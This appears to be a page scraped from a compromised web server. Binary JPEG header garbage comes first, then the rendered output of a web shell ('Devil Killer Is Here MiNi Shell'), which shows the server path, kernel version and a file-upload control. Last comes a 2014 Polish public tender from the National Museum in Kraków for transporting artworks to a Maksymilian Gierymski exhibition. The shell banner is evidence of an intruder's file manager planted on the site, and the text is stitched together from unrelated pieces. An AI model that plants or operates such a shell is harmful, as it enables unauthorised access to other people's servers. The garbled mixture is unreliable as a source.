JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140212/27877-N-2014.html

<p class="kh_header"><b>Kraków: Przedmiotem zamówienia jest kompleksowa usługa transportu obiektów na wystawę Maksymilian Gierymski. Dzieła, inspiracje, recepcja wraz z czynnościami towarzyszącymi</b><br>
<b>Numer ogłoszenia: 27877 - 2014; data zamieszczenia: 12.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Narodowe w Krakowie , Al. 3-go Maja 1, 30-062 Kraków, woj. małopolskie, tel. 12 43 35 621, faks 12 43 35 555.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest kompleksowa usługa transportu obiektów na wystawę Maksymilian Gierymski. Dzieła, inspiracje, recepcja wraz z czynnościami towarzyszącymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest kompleksowa usługa transportu obiektów na wystawę Maksymilian Gierymski. Dzieła, inspiracje, recepcja wraz z czynnościami towarzyszącymi.
Transport obiektów na wystawę Maksymilian  Gierymski. Dzieła, inspiracja, recepcja obejmuje transport od wskazanych właścicieli obiektów do Muzeum Narodowego w Krakowie (Gmach Główny) i transport powrotny z Muzeum Narodowego w Krakowie (Gmach Główny) do właścicieli obiektów oraz realizację wszystkich czynności z nim związanych, w szczególności:zakup i dostawa biletów lotniczych (klasa ekonomiczna), biletów kolejowych dla przedstawicieli instytucji użyczających obiekty zgodnie z wytycznymi z listy obiektów zarówno w transporcie do MNK jak  również w transporcie powrotnym, zapewnienie miejsca dla kuriera w samochodzie na wskazanych zgodnie z listą obiektów trasach, zarówno w transporcie obiektów do MNK jak  również w transporcie powrotnym do właścicieli, zapewnienie usługi noclegowej dla kuriera towarzyszącemu obiektom na trasach zgodnie z listą zarówno w transporcie do MNK jak również w transporcie powrotnym do właścicieli,zapewnienie usługi noclegowej w Krakowie dla przedstawicieli instytucji użyczających na czas rozpakowania i montażu na ekspozycji w MNK oraz na czas demontażu i pakowania w związku ze zwrotem obiektów do właścicieli zgodnie z listą.Transport obiektów będzie się składał z dwóch etapów:Etap I: 
Transport od właścicieli obiektów (według listy obiektów) do Muzeum Narodowego w Krakowie (Gmach Główny) w terminie od 31.03.2014 do 16.04.2014 (zgodnie z wytycznymi z listy obiektów).Wszystkie czynności wynikające z realizacji transportu od właścicieli obiektów do Muzeum Narodowego w Krakowie (Gmach Główny) zawarte są w zakresie usługi.Wykonawca ma prawo wyboru szczegółowej trasy realizacji transportu obiektów od poszczególnych właścicieli do miejsca docelowego, pod warunkiem zachowania wymaganych w przetargu ram czasowych. Szczegółowy plan transportu dla etapu I na wszystkich trasach musi zostać przedstawiony Zamawiającemu najpóźniej w ciągu 7 dni od dnia zawarcia umowy. 
Wykonawca zobowiązany jest do zabezpieczenia samochodu transportującego obiekty podczas postoju (zgodnie z wytycznymi wskazanymi w załączniku nr 1.1 do specyfikacji).Wykonawca zapewni:zakup i dostawę biletów lotniczych (klasa ekonomiczna), biletów kolejowych dla przedstawicieli instytucji użyczających obiekty zgodnie z wytycznymi z listy obiektów zarówno w transporcie do MNK jak również w transporcie powrotnym, miejsce dla kuriera w samochodzie na wskazanych zgodnie z listą trasach, zarówno w czasie transportu po obiekty jak również w drodze powrotnej z obiektami do MNK,noclegi dla kuriera na trasach zgodnie z listą, zarówno w czasie transportu po obiekty jak również w drodze powrotnej z obiektami do MNK,noclegi w Krakowie dla przedstawicieli instytucji użyczających na czas rozpakowania i montażu na ekspozycji w MNK zgodnie z listą.
Szczegółowy harmonogram i dokładne trasy podróży kurierów i przedstawicieli właścicieli obiektów wykonawca opracuje w uzgodnieniu z właścicielami obiektów i przedstawi zamawiającemu wraz ze szczegółowym planem transportów w etapie I.
Etap II:Transport zwrotny obiektów z Muzeum Narodowego w Krakowie (Gmach Główny) do właścicieli obiektów (według listy obiektów) po zakończeniu wystawy, od 11.08.2014 do 26.08.2014 roku. 
Wszystkie czynności wynikające z realizacji transportu zwrotnego z Muzeum Narodowego w Krakowie (Gmach Główny) do właścicieli obiektów, zawarte są w zakresie usługi.Uwaga: Zakończenie wystawy 10.08.2014 roku.Wykonawca ma prawo wyboru szczegółowej trasy realizacji transportu obiektów od poszczególnych właścicieli do miejsca docelowego, pod warunkiem zachowania wymaganych w przetargu ram czasowych.Szczegółowy plan transportu dla etapu II na wszystkich trasach musi zostać przedstawiony Zamawiającemu najpóźniej na miesiąc przed dniem zakończenia wystawy.Wykonawca zobowiązany jest do zabezpieczenia samochodu transportującego obiekty podczas postoju (zgodnie z wytycznymi wskazanymi w załączniku nr 1.1 do specyfikacji).Wykonawca zapewni:zakup i dostawę biletów lotniczych (klasa ekonomiczna), biletów kolejowych dla przedstawicieli instytucji użyczających obiekty zgodnie z wytycznymi z listy obiektów zarówno w transporcie do MNK jak  również w transporcie powrotnym,miejsce dla kuriera w samochodzie na wskazanych zgodnie z listą trasach, zarówno w czasie transportu z obiektami  do właścicieli jak również w drodze powrotnej do MNK,noclegi dla kuriera na trasach zgodnie z listą, zarówno w czasie transportu z obiektami do właścicieli jak również w drodze powrotnej do MNK,
noclegi w Krakowie dla przedstawicieli instytucji użyczających na czas demontażu i pakowania w związku ze zwrotem obiektów do właścicieli - zgodnie z listą.Szczegółowy harmonogram i dokładne trasy podróży kurierów i przedstawicieli właścicieli obiektów wykonawca opracuje w uzgodnieniu z właścicielami obiektów i przedstawi zamawiającemu wraz ze szczegółowym planem transportów w etapie II.Transporty na trasach pomiędzy właścicielami obiektów a Muzeum Narodowego w Krakowie (Gmach Główny) oraz Muzeum Narodowego w Krakowie (Gmach Główny) a właścicielami obiektów odbywać się będą drogą lądową..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.00.00.00-8, 22.45.90.00-2, 55.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy spełniający warunki udziału w postępowaniu dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,tj.  licencję na międzynarodowy transport zarobkowy przewozu drogowego rzeczy, zgodnie z ustawą o transporcie drogowym (Dz.U. z 2001 nr 125 poz. 1371, ze zm.).

W celu wykazania spełniania warunku udziału w postępowaniu Wykonawca zobowiązany jest dostarczyć  ważną licencję na międzynarodowy transport zarobkowy przewozu drogowego rzeczy, zgodnie z ustawą o transporcie drogowym (Dz.U. z 2001 nr 125 poz. 1371, ze zm.).

W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie (co oznacza że spełnienie warunku udziału w postępowaniu przez jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego jest spełnieniem warunku udziału w postępowaniu). W przypadku składania dokumentów przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawca, którego dotyczy dokument określony w niniejszym ppkt. musi wykonywać wynikające z umowy o udzielenie zamówienia publicznego czynności, które należą do działalności regulowanej, podlegającej wpisowi do rejestru . Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy spełniający warunki udziału w postępowaniu dotyczące: posiadania wiedzy i doświadczenia tj. 
wykonali należycie w okresie ostatnich trzech lat przed upływem terminu  składania ofert (a jeżeli okres prowadzenia działalności jest krótszy-w tym okresie): co najmniej 1 zamówienie polegające na zrealizowaniu usługi transportu drogą lądową dzieł sztuki na trasach krajowych o wartości co najmniej 40.000,00 zł brutto,
oraz co najmniej 1 zamówienie polegające na zrealizowaniu usługi transportu drogą lądową dzieł sztuki na trasach międzynarodowych o wartości co najmniej 80.000,00 zł brutto. 
Oba wskazane wyżej zamówienia powinny obejmować oprócz przewozu dzieł sztuki usługę również specjalistycznego pakowania oraz rozpakowywania przewożonych dzieł sztuki. Pod pojęciem pakowania i rozpakowywania Zamawiający rozumie przygotowanie dzieł sztuki do transportu (dostarczenie lub wykonanie specjalistycznych opakowań, umieszczenie w nich dzieł sztuki oraz umieszczenie zapakowanych dzieł w przestrzeniach ładunkowych pojazdów przeznaczonych do przewozu dzieł sztuki), jak i rozpakowanie dzieł przed ich ekspozycją w miejscu przeznaczenia.

W celu wykazania spełniania warunku udziału w postępowaniu Wykonawca zobowiązany jest dostarczyć 

wykaz (załącznik nr 5 do specyfikacji) wykonanych, a w przypadku świadczeń okresowych i ciągłych również wykonywany w okresie ostatnich trzech lat przed terminem składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), z należytą starannością głównych usług, tj. :
co najmniej 1 zamówienia polegającego na zrealizowaniu usługi transportu drogą lądową dzieł sztuki na trasach krajowych o wartości co najmniej 40.000,00 zł brutto,
oraz co najmniej 1 zamówienia polegającego na zrealizowaniu usługi transportu drogą lądową dzieł sztuki na trasach międzynarodowych o wartości co najmniej 80.000,00 zł brutto;  
Oba wskazane wyżej zamówienia powinny obejmować oprócz przewozu dzieł sztuki usługę również specjalistycznego pakowania oraz rozpakowywania przewożonych dzieł sztuki. Oba wskazane wyżej zamówienia powinny obejmować oprócz przewozu dzieł sztuki usługę również specjalistycznego pakowania oraz rozpakowywania przewożonych dzieł sztuki. Pod pojęciem pakowania i rozpakowywania Zamawiający rozumie przygotowanie dzieł sztuki do transportu (dostarczenie lub wykonanie specjalistycznych opakowań, umieszczenie w nich dzieł sztuki oraz umieszczenie zapakowanych dzieł w przestrzeniach ładunkowych pojazdów przeznaczonych do przewozu dzieł sztuki), jak i rozpakowanie dzieł przed ich ekspozycją w miejscu przeznaczenia

wraz z dowodami, że zamówienie to zostało wykonane należycie o których mowa w par. 1 ust.2 pkt 1 albo 3 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzaju  dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. 2013, poz.231);
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie tych podmiotów do oddania mu do dyspozycji n iezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do postępowania przetargowego zostaną dopuszczeni Wykonawcy spełniający warunki udziału w postępowaniu dotyczące 
dysponowania odpowiednim potencjałem technicznym , tj. dysponują lub będą dysponować następującym sprzętem: minimum 1 (jednym) samochodem umożliwiającym realizację transportu drogą lądową spełniającymi następujące warunki techniczne: 
dobrze resorowany (z zawieszeniem pneumatycznym na oś przednią i oś tylną),posiada skrzynię ładunkową izolowaną i klimatyzowaną (możliwość utrzymania   temperatury 18-20 oC ?1 oC dobowo, RH 15-40%), posiadającą wyposażenie do unieruchomiania  skrzyń    i obiektów we właściwej pozycji,wyposażony w platformę- podnośnik hydrauliczny, kabina powinna mieć miejsca dla dwóch kierowców oraz kuriera  
pojazd musi być zabezpieczony przed kradzieżą w następujący sposób: musi być   wyposażony w blokadę stacyjki oraz przycisk alarmowy w kabinie kierowcy, samochód musi być wyposażony w lokalizator GPS. Kabina   musi być też wyposażona w blokadę od wewnątrz. Przestrzeń załadunkowa musi być monitorowana oraz wyposażona w system alarmowy łączący się z kierowcą. Zarówno  klapa z tyłu pojazdu, jak i drzwi muszą posiadać zamknięcie,
w pojeździe powinna znajdować się gaśnica, łańcuchy na koła, gniazdka elektryczne/kable oraz inne urządzenia pozwalające na dostosowanie się do różnych warunków pogodowych. Przed transportem, wnętrze pojazdu należy dokładnie wyczyścić i poddać szczegółowej inspekcji technicznej oraz wszelkim innym kontrolom, zgodnie z planem przeglądu technicznego pojazdu,
samochód musi być wyposażony w system GPS z mapą elektroniczną. 
                        

W celu wykazania spełniania warunku udziału w postępowaniu Wykonawca zobowiązany jest dostarczyć 
wykaz (załącznik nr 6 specyfikacji) narzędzi dostępnych wykonawcy usług w celu wykonania zamówienia wraz informacja o podstawie dysponowania tymi zasobami tj. wykaz zawierający informacje dotyczące dysponowania minimum 1 (jednym) samochodem, spełniającym następujące warunki techniczne:  - 
dobrze resorowany (z zawieszeniem pneumatycznym na oś przednią i oś tylną),
posiada skrzynię ładunkową izolowaną i klimatyzowaną (możliwość utrzymania     temperatury 18-20 oC ?1 oC dobowo, RH 15-40%), posiadającą wyposażenie do unieruchomienia skrzyń   i obiektów we właściwej pozycji,wyposażony w platformę- podnośnik hydrauliczny, kabina powinna mieć miejsca dla dwóch kierowców oraz kuriera, pojazd musi być zabezpieczony przed kradzieżą w następujący sposób: musi być wyposażony w blokadę stacyjki oraz przycisk alarmowy w kabinie kierowcy, samochód musi być wyposażony w lokalizator GPS. Kabina musi być też wyposażona w blokadę od wewnątrz. Przestrzeń załadunkowa musi być monitorowana oraz wyposażona w system alarmowy łączący się z kierowcą. Zarówno klapa z tyłu pojazdu, jak i drzwi muszą posiadać zamknięcie,
w pojeździe powinna znajdować się gaśnica, łańcuchy na koła, gniazdka elektryczne/kable oraz inne urządzenia pozwalające na dostosowanie się do różnych warunków pogodowych. Przed transportem, wnętrze pojazdu należy dokładnie wyczyścić i poddać szczegółowej inspekcji technicznej oraz wszelkim innym kontrolom, zgodnie z planem przeglądu technicznego pojazdu,samochód musi być wyposażony w system GPS z mapą elektroniczną.
W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument potwierdzający spełnienie w/w warunku Wykonawcy mogą złożyć wspólnie (co oznacza że spełnienie warunku udziału w postępowaniu przez jednego z wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego jest spełnieniem warunku udziału w postępowaniu). W przypadku składania dokumentów przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawca, może polegać na  potencjale technicznym,  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
zobowiązanie tych podmiotów do oddania mu do dyspozycji n iezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawcy składają oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku. Wykonawcy składają oświadczenie o spełnianiu warunków udziału w postępowaniu. Ocena spełniania warunku udziału w postępowaniu odbywać się będzie na podstawie złożonych przez wykonawcę dokumentów i oświadczeń zgodnie z zasadą: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W zawartej umowie nie jest możliwe wprowadzanie istotnych zmian w stosunku do treści oferty po za przewidzianymi w niniejszym ogłoszeniu;
Warunki i okoliczności uprawniające do wniosku o zmianę.I. Zamawiający
1.Zamawiający przewiduje i zastrzega sobie wprowadzenie zmiany w treści umowy 
w zakresie:
1)terminów określonych umową i jej załącznikami (nie dotyczy sytuacji w której zmiana terminu wynikałaby z przyczyn leżących po stronie wykonawcy),
2)sposobu realizacji zamówienia o ile wpływa on pozytywnie na realizacje umowy dla obydwu stron (dotyczy warunków płatności i odbioru);
3)ceny brutto w przypadku zmiany ustawowej stawki podatku VAT (cena netto nie podlega zmianie),
4)Zamawiający zastrzega sobie prawo ograniczenia w trakcie trwania umowy jej przedmiotu poprzez rezygnację z części odbieranych dzieł, bez potrzeby zawierania aneksu. 
5) Zamawiający zastrzega sobie prawo do odstąpienia od umowy w zakresie poszczególnych miejsc odbioru dzieł (i poszczególnych dzieł stamtąd odbieranych).
Zmiana uzasadniona może być przyczynami organizacyjnymi i technicznymi a wniosek o zmianę przysługuje w ww. zakresie odpowiednio Zamawiającemu i Wykonawcy. 
2.Zamawiający na powyższy zakres przedłoży propozycję zmiany umowy w formie aneksu.
II.Wykonawca
1.Wykonawca zobowiązany jest do ostrzegania Zamawiającego, tak wcześnie jak 
to możliwe, o szczególnych przyszłych wydarzeniach i okolicznościach, które mogą wpłynąć na jakość usług (w każdy sposób) lub opóźnienie w realizacji usług. Zamawiający zażąda od wykonawcy oceny wpływu przyszłego wydarzenia i okoliczności wpływających na cenę umowną i na datę zakończenia wykonywania usług
2.Wykonawca opracuje i przedstawi Zamawiającemu do akceptacji propozycje dotyczące uniknięcia lub zmniejszenia wpływu takiego wydarzenia lub okoliczności mających wpływ na realizację usług, jak też będzie współpracował przy wykonywaniu odnośnych zaleceń Zamawiającego.
3.Okoliczności, o których mowa w ust. 1 i 2 mogą wpłynąć na zmianę treści umowy.
Wnioski o zmianę.
Wniosek o zmianę składany przez WYKONAWCE musi wpłynąć do Zamawiającego w terminie minimum 3 dni przed planowanym wprowadzeniem zmian, pisemnie. 
Wniosek Zamawiającego składany jest do wskazanej w umowie przez WYKONAWCĘ osoby w terminie minimum na 3 dni przed wprowadzeniem zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe w Krakowie, Al. 3-go Maja 1, 30-062 Kraków, pok. 050.</p>
